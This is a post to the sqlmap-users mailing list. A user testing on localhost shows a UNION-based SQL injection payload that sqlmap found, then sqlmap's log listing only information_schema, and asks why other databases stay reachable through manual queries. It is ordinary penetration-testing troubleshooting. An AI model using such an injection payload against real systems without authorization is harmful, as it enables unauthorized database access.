So I was doing an experiment at work today with sqlmap. sqlmap found the following injection:

Type: UNION query
Title: MySQL UNION query (NULL) - 11 to 20 columns
Payload: http://localhost:80/-1616 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,110,105,115,58),IFNULL(CAST(CHAR(122,81,104,83,72,98,108,107,112,107) AS CHAR),CHAR(32)),CHAR(58,115,100,101,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#

And when trying to list the databases, I get the following:

[18:17:45] [INFO] fetching database names
[18:17:47] [INFO] the SQL query used returns 6 entries
available databases [1]:
[*] information_schema

But I can still query from the other 5 databases and reach all data by manually altering the injection query. Anyone have any idea what's up with that?

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users